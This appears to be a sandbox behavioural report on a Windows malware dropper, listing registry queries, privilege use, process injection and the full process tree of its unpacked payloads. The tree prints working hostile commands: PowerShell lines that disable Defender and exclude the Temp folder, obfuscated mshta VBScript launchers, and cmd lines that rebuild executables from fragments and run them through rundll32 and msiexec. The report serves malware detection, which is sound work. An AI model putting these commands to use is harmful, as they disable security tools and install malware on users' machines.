Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3160 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3160 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3160 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3368 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe
PID 3368 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe
PID 3368 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe
PID 3952 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3952 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1736 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe
PID 1736 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe
PID 1736 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe
PID 5112 wrote to memory of 3824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 5112 wrote to memory of 3824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 5112 wrote to memory of 3824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 540 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe
PID 540 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe
PID 540 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe
PID 5084 wrote to memory of 3964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe
PID 5084 wrote to memory of 3964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe
PID 5084 wrote to memory of 3964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe
PID 996 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe
PID 996 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe
PID 996 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe
PID 4912 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe
PID 4912 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe
PID 4912 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe
PID 4296 wrote to memory of 4152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe

Processes

C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe

"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe

Sat0663b341399ee.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe

Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe

Sat0647140c100d63.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe

Sat0619212f22dd7.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe

Sat0618d93ac2c5c.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe

Sat06ebc37d1c94352.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe

Sat06f5ed0e3bb24.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat060fd7e42d2.exe

Sat060fd7e42d2.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe

Sat0675f75df01bdb.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3952 -ip 3952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1428 -ip 1428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1028 -ip 1028

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 360

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 840

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 844

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Sat06f5ed0e3bb24.exe" /F

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5"" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1028 -ip 1028

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Sat0663b341399ee.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 840

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 944

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE ( CREAteobjEcT ( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " , 0 ,True ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 972

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 +FDKD47Ef.I1+ U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 992

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 844

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 932

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat0675f75df01bdb.exe" /f

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network

